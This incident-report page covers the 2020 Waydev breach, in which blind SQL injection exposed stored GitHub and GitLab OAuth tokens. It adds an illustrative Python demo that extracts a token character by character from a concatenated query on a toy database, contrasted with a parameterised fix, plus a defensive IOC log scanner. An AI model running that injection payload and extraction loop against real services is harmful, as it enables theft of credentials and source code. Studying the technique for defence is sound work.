Cyber Incident Victim: Waydev
Date: Jul 2020
Location: United States of America
Summary
Hackers exploited a blind SQL injection vulnerability to breach a Git analytics firm's internal database and steal GitHub and GitLab OAuth tokens, which were then used to access the source code repositories of other organizations, including at least two confirmed victims. Waydev patched the vulnerability immediately upon discovery, worked with GitHub and GitLab to revoke the affected tokens and deploy replacement OAuth applications, added controls such as manual account approvals and activity monitoring, and shared threat indicators with authorities and customers for log analysis.
Description
On July 3, 2020, Waydev, a Git analytics platform serving software companies, detected a security breach after GitHub's security team alerted one of its customers to suspicious activity traced to that customer's Waydev OAuth token. The investigation found that attackers had exploited a blind SQL injection vulnerability in Waydev's systems to reach its internal database and steal GitHub and GitLab OAuth tokens. These tokens, which Waydev holds so that its analytics can read customers' repositories, were then abused to pivot into the codebases of at least two other organizations, digital banking service Dave.com and load-testing platform Flood.io, giving the attackers unauthorized access to those companies' source code. Waydev patched the vulnerability as soon as it was found and worked with GitHub and GitLab to delist its original OAuth applications, revoke the compromised tokens, and register replacement OAuth applications, so that the stolen tokens no longer granted access. CEO Alex Circei stated that the evidence indicated only a limited subset of customer codebases had been accessed, though the exact scope was still being assessed.
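The page names the vulnerability class but not the injection point. As an added example, not Waydev's code and not a description of the real flaw, the block below models the technique on a hypothetical SQLite-backed integrations table: a yes/no lookup endpoint written once with string-concatenated SQL and once with a bound parameter, and the boolean-based blind extraction loop that recovers a stored token one character at a time from the vulnerable version while getting nothing from the safe one. The table schema, org names and token values are constructed placeholders.

```python
import sqlite3

# Character set the extraction loop tries at each position (64 symbols).
ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"


def build_db():
    """Constructed in-memory stand-in for a vendor's integrations table.
    Schema, org names and token values are hypothetical, not Waydev's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE integrations (org TEXT PRIMARY KEY, oauth_token TEXT)")
    conn.executemany(
        "INSERT INTO integrations VALUES (?, ?)",
        [("acme", "gho_EXAMPLE1"), ("globex", "glpat-EXAMPLE2")],
    )
    return conn


def org_exists_vulnerable(conn, org):
    """Boolean endpoint that builds its SQL by concatenation.
    The caller only learns True/False, which is all a blind injection needs."""
    sql = f"SELECT 1 FROM integrations WHERE org = '{org}'"
    return conn.execute(sql).fetchone() is not None


def org_exists_safe(conn, org):
    """Same endpoint with a bound parameter: the input never reaches the SQL
    grammar, so an injected condition is just an org name that does not exist."""
    sql = "SELECT 1 FROM integrations WHERE org = ?"
    return conn.execute(sql, (org,)).fetchone() is not None


def blind_extract_token(oracle, target_org, max_len=64):
    """Boolean-based blind extraction.

    `oracle(org) -> bool` is the only signal the attacker observes. Each query
    asks whether one character at one position of the stored token equals a
    guess; the token is rebuilt from the yes/no answers. Returns the recovered
    token and the number of queries spent."""
    token = ""
    queries = 0
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            # The closing quote ends the org literal; '-- ' comments out the
            # original trailing quote (SQLite treats '--' as a line comment).
            payload = f"{target_org}' AND substr(oauth_token, {pos}, 1) = '{ch}' -- "
            queries += 1
            if oracle(payload):
                token += ch
                break
        else:
            # No guess matched: either the token ended or the injection failed.
            break
    return token, queries


if __name__ == "__main__":
    conn = build_db()
    leaked, n = blind_extract_token(lambda o: org_exists_vulnerable(conn, o), "acme")
    print(f"concatenated SQL leaked {leaked!r} in {n} queries")
    leaked, n = blind_extract_token(lambda o: org_exists_safe(conn, o), "acme")
    print(f"parameterised SQL leaked {leaked!r} in {n} queries")
```

The extraction needs roughly (alphabet size x token length) requests, which is why a blind injection against an endpoint that only returns a status code or a page variant is still a full data-exfiltration primitive, and why a token table should be reached only through parameterised queries regardless of how little the endpoint appears to reveal.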

The incident prompted Waydev to notify U.S. authorities and to share the attackers' indicators of compromise (IP addresses, email addresses, and user-agent strings) so that customers could review their own logs for signs of intrusion. The company also tightened its controls, introducing manual approval of new accounts, continuous activity monitoring, and periodic token resets to limit how long a stolen token stays usable. While Dave.com and Flood.io publicly attributed their breaches to the stolen Waydev tokens, no other compromised organizations were confirmed in the initial disclosure. Waydev directed affected users to its support page for further guidance but did not disclose the total number of impacted customers or repositories. The breach illustrates the risk of third-party OAuth token management: a vendor that holds long-lived tokens to many customers' repositories becomes a single point of compromise for all of them, so a flaw in the vendor's own application can expose source code the vendor never hosted.
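As an added example of the log review the shared indicators were meant to support (not code from Waydev or from the page), the block below parses combined-format access log lines and flags any whose client IP, authenticated user, or user-agent matches an indicator list. The indicator values (TEST-NET address ranges, an example.com address, a made-up user-agent) and the log lines are constructed placeholders, not the real IOCs from the incident.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed indicators in the three shapes the vendor shared: IP addresses
# (given here as networks so single hosts and ranges are handled alike),
# e-mail addresses, and user-agent strings. Placeholder values only.
IOC_NETWORKS = [ip_network("203.0.113.0/24"), ip_network("198.51.100.7/32")]
IOC_EMAILS = {"attacker@example.com"}
IOC_USER_AGENTS = {"Mozilla/5.0 (compatible; ExampleScraper/1.0)"}

# Apache/nginx combined log format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log; lines 2, 3 and 4 carry an indicator, 1 and 5 are benign.
SAMPLE_LOG = """\
10.0.0.5 - alice [03/Jul/2020:09:12:01 +0000] "GET /api/v3/repos/acme/app HTTP/1.1" 200 5123 "-" "git/2.27.0"
203.0.113.44 - - [03/Jul/2020:09:15:42 +0000] "GET /api/v3/repos/acme/app/git/trees/HEAD HTTP/1.1" 200 88210 "-" "Mozilla/5.0 (compatible; ExampleScraper/1.0)"
10.0.0.9 - attacker@example.com [03/Jul/2020:09:16:10 +0000] "POST /oauth/token HTTP/1.1" 200 412 "-" "curl/7.68.0"
198.51.100.7 - - [03/Jul/2020:09:20:03 +0000] "GET /api/v3/user/repos HTTP/1.1" 200 1337 "-" "git/2.27.0"
10.0.0.5 - bob [03/Jul/2020:09:21:00 +0000] "GET /api/v3/repos/acme/app HTTP/1.1" 200 5123 "-" "git/2.27.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None if the
    line does not match (callers should count those rather than drop them)."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_iocs(entry):
    """Return the list of indicator types an entry matches, in a fixed order
    (ip, email, user_agent) so results are easy to compare."""
    reasons = []
    try:
        addr = ip_address(entry["ip"])
        if any(addr in net for net in IOC_NETWORKS):
            reasons.append("ip")
    except ValueError:
        pass  # non-IP in the client field (e.g. a proxy placeholder); skip IP check
    if entry["user"] in IOC_EMAILS:
        reasons.append("email")
    if entry["ua"] in IOC_USER_AGENTS:
        reasons.append("user_agent")
    return reasons


def scan_log(text):
    """Scan a log body and return one hit dict per matching line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = check_iocs(entry)
        if reasons:
            hits.append({"line": lineno, "ip": entry["ip"], "user": entry["user"],
                         "ts": entry["ts"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} {hit['user']} [{hit['ts']}] -> {', '.join(hit['reasons'])}")
```

In practice the indicators are loaded from the vendor's bulletin rather than hard-coded, and the same matching applies to GitHub or GitLab audit-log exports once their actor, IP and user-agent fields are mapped into the entry dict; an IP hit on its own warrants a look at what that session did, since the stolen tokens were valid credentials and the requests they made would otherwise look like normal API traffic.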
